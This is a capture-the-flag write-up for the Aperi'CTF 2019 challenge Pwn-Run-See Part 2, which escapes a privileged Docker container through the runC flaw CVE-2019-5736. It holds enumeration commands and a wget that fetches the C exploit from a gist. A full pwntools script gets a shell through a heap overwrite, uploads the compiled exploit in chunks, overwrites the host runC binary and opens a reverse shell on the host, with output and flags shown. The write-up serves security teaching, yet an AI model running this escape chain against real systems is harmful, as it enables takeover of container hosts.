Aperi’CTF 2019 - Pwn-Run-See - Part 2
Challenge details
Event | Challenge | Category | Points | Solves |
Aperi’CTF 2019 | Pwn-Run-See - Part 2 | Pwn | 250 | 2 |
We’re given a docker-compose.yml configuration file.
Task description:
Reynholm Industries’ ticket management service seems to be running in a container, fortunately you found its configuration file on the Internet.
Find a way to take control of the hosting server and learn more about Reynholm Industries.
The task is to get out of the container using the access we got from the previous step.
Post exploitation
First, we’ve to ensure that we’re running in a Docker container. Since Docker container relies on cgroups and namespaces to isolate itself from the host and other containers, we can check if our devices belongs to a specific control group:
cat /proc/1/cgroup
It’s definitely a Docker container named b505d9295ae5c8b25b2e2e4d8be0833fb290818c44f0a1af95485ec16d5482fc
! Let’s inspect its init command line (https://docs.docker.com/engine/reference/run/#cmd-default-command-or-options):
cat /proc/1/cmdline
Looking at the command line of the init process, we can retrieve the starting script of the Docker container:
/etc/init.d/xinetd start
sleep infinity
Nothing really noteworthy, it’s basically a startup script for xinetd
which is used to serve the challenge application (see first step).
Since it’s the only process that’ll be executed in the Docker container, there’s probably something that we can exploit to escape the Docker container. What about the Docker volumes?
Docker volumes
To list the Docker volumes from the inside of the container, we can simply enum the mount points and see which one has been mounted from a physical volume (actually virtual but it’s seen as a physical volume inside the container):
mount | grep -E "^/dev/"
/dev/sda1 on /etc/xinetd.conf type ext4 (ro,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /data/chall type ext4 (ro,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /data/flag type ext4 (ro,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda1 on /etc/xinetd.d/ctf type ext4 (ro,relatime,errors=remount-ro,data=ordered)
Once again, there is nothing really interesting, the hostname
, resolv.conf
and hosts
files are writable and the other challenge files are read-only.
Let’s take a look at the given docker-compose.yml configuration file.
Analyzing the docker-compose.yml file is pretty obvious since it’s a well-known and well-configured file (see the documentation).
There is only one service called pwn-run-see
The container is running over the creased/xinetd:latest
image which is public.
Let’s analyze this image using dive:
docker pull creased/xinetd:latest
dive -j report.json creased/xinetd:latest
"layer": [
"index": 0,
"digestId": "sha256:5dacd731af1b0386ead06c8b1feff9f65d9e0bdfec032d2cd0bc03690698feda",
"sizeBytes": 55266564,
"command": "#(nop) ADD file:4fc310c0cb879c876c5c0f571af665a0d24d36cb9263e0f53b0cda2f7e4b1844 in / "
"index": 1,
"digestId": "sha256:8d97195c3bcc2b294a2eecbb5242caed8d5ffc3356e17bf8e3c637f944508489",
"sizeBytes": 74212807,
"command": "dpkg --add-architecture i386 \u0026\u0026 apt-get update \u0026\u0026 apt-get install -y --no-install-recommends --no-install-suggests xinetd netcat libc6-dev:i386"
"index": 2,
"digestId": "sha256:3601e14907cf56f86dba0e629bdff11d506865d9a1105ec48a354436f078a640",
"sizeBytes": 53,
"command": "#(nop) COPY file:fcc7929a516a9e79c7885f2e1e0849709d244b51905e391ccebf1fd9c6ec6bf3 in /start.sh "
"index": 3,
"digestId": "sha256:bc0e8f5e03cfbcbf38adff43bdbeddab00940176308c96e03e1be00217f3c89f",
"sizeBytes": 53,
"command": "chmod +x /start.sh"
"index": 4,
"digestId": "sha256:6a316e08802ea113fe51b1c30b5b5cb6a675a4591ebc0d479d14eeae82e30f68",
"sizeBytes": 0,
"command": "#(nop) WORKDIR /data"
The container is based on debian:stretch-slim
and basically embbed a xinetd
service and netcat
. Nothing really relevant here.
No user remapping has been configured and the container is running in privileged mode. It’s a valuable information since the privileged mode allows us to exploit extended Linux capabilities.
An healthcheck has been configured and is used apparently to ping the xinetd
service using netcat
every 10 seconds.
Let’s see if we see this process from the inside of the container using a beautiful oneline (don’t blame me, there is no Python script interpreter in the container 😄):
echo 'while true; do touch ./watchdog; find /proc -maxdepth 1 -type d -name "[0-9]*" -cnewer ./watchdog -exec sh -c "cat {}/cmdline | grep -Eav '"'"'(cat)|(grep)|(sleep)|(touch)|(search\.sh)'"'"'" \; 2>/dev/null; done' >search.sh
chmod +x search.sh
A runC
process is spawned every 10 seconds which corresponds to our healthcheck process.
runC process
The runC init
process is responsible of running the healthcheck process inside the container and is executed in memory using the memfd_create()
The memfd_create()
system call is close to malloc() but it does not return a pointer to the allocated memory but rather returns a file descriptor that refers to an anonymous file that is only visible in the filesystem as a link in /proc/PID/fd/
which may be used to execute it using execve()
The name supplied in name is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/.
There was a flaw in the way runC handled system file descriptors when running containers that allows us to overwrite content of the runC
binary and consequently run arbitrary commands on the container host system.
The security flaw has been fixed to create a temporary copy of the calling binary itself when it starts or attaches to containers, thus allowing to prevent further modifications.
To summarize the /proc/PID/exe
file is a symbolic link created by the kernel for every process which points to the binary that was executed for that process, in this case the host runC
binary which can be overwritten in a privileged Docker container.
Escaping Docker container
To exploit this vulnerability, I’ve developped a new C exploit based on the original post from DragonSector’s blog.
The exploit consists in:
- Waiting for a
process to spawn in the Docker container - Creating a new file descriptor to lock the original file descriptor
- Opening it for writing
- Overwriting the
binary - Waiting for the next
process to spawn to finally get a shell on the host system
The exploit can be picked on my GitHub Gist repo.
To drop the exploit on the remote system, we can use pwntools
and pipe the compressed pre-compiled exploit to the remote system:
wget https://gist.githubusercontent.com/Creased/d4c493cac872ff373f9c05c8e7d0f839/raw/cve-2019-5736.c
gcc -Wall -static -Os -s -o cve-2019-5736 cve-2019-5736.c
# coding: utf8
import base64
import os
import gzip
import time
from io import BytesIO
from pwn import *
MAX_SIZE = 768 # Change if an error occurs while sending the exploit.
PROMPT = "# "
GDB = False
LOCAL_EXPLOIT = 'cve-2019-5736'
REMOTE_EXPLOIT = '/data/exploit'
HOST = ''
context.log_level = 'info'
log.info('Opening a remote connection...')
p = remote(HOST, 31337)
if GDB:
gdb_cmd = 'c'
gdb.attach(p, gdb_cmd)
elf = ELF('./files/chall')
def recv_menu():
p.recvuntil('Your choice:\n=> ')
def new_ticket(name, service, description):
p.recvuntil('Your name: ')
p.recvuntil('The destination service: ')
p.recvuntil('Description: ')
def process_tickets():
log.info('Stage 1 - Get a shell!\n')
run_task = elf.symbols['run_task']
log.info('Creating junk tickets...')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')
new_ticket('Blah', 'ADM', 'Junk')
log.info('Creating an intern...')
new_ticket('Blah', 'ADM', 'Create intern')
log.info('Overwriting the intern...')
new_ticket("The giver", "ADM", '%s/bin/sh' % p32(run_task))
new_ticket("Get flag", "ADM", "-i")
log.info('Getting a shell...')
p.sendline('cat /data/flag')
flag1 = p.recvline()
log.info('Flag 1: %s' % flag1)
log.info('Stage 2 - Escape the Docker container!\n')
### Compress the exploit using gzip.
log.info('Compressing the exploit...')
buf = BytesIO()
with open(LOCAL_EXPLOIT, 'rb') as exploit_fd:
exploit = exploit_fd.read()
with gzip.GzipFile(mode='wb', fileobj=buf) as fd:
### Encode it in base64.
exploit = base64.b64encode(buf.getvalue())
### Flush the tube.
log.info('Flushing the tube...')
### Send the base64(gzip(exploit)) on the remote host.
log.info('Sending the exploit...')
start_time = time.time()
#### Chunking send.
for i in range(0, len(exploit), MAX_SIZE):
chunk = exploit[i:i+MAX_SIZE]
p.sendline('echo -n "{0}" >>{1}.z'.format(chunk, REMOTE_EXPLOIT))
log.info('Send: {0}/{1}'.format(i, len(exploit)))
elapsed_time = time.time() - start_time
log.success('Exploit has been sent in {}!'.format(time.strftime('%H:%M:%S', time.gmtime(elapsed_time))))
### Decompress the exploit on the remote host.
log.info('Decompressing the exploit...')
p.sendline('cat {0}.z | base64 -d - | gzip -dcq >{0}'.format(REMOTE_EXPLOIT))
### Mark the exploit as executable.
p.sendline('chmod +x {0}'.format(REMOTE_EXPLOIT))
### Run the exploit.
log.info('Running the exploit...')
p.recvuntil('[+] Successfully overwritten the file!\n')
### Get remote shell
log.info('Getting a reverse shell...')
p2 = remote(HOST, 31338)
## Get flag
p2.sendline('cat /root/flag')
flag2 = p.recvline(timeout=0.5)
log.info('Flag 2: %s' % flag2)
[*] Stage 1 - Get a shell!
[*] Creating junk tickets...
[*] Creating an intern...
[*] Overwriting the intern...
[*] Getting a shell...
[*] Flag 1: APRK{Us3_3m_4Ll_4f73r_fR3e!}
[*] Stage 2 - Escape the Docker container!
[*] Compressing the exploit...
[*] Flushing the tube...
[*] Sending the exploit...
[*] Send: 0/379792
[*] Send: 379392/379792
[+] Exploit has been sent in 00:00:00!
[*] Decompressing the exploit...
[*] Running the exploit...
[*] Getting a reverse shell...
[*] Flag 2:
[*] Switching to interactive mode
The final flag is APRK{N3V3r_l0ok_b4cK_4Nd_w1n_thE_RAc3!}
Happy Hacking!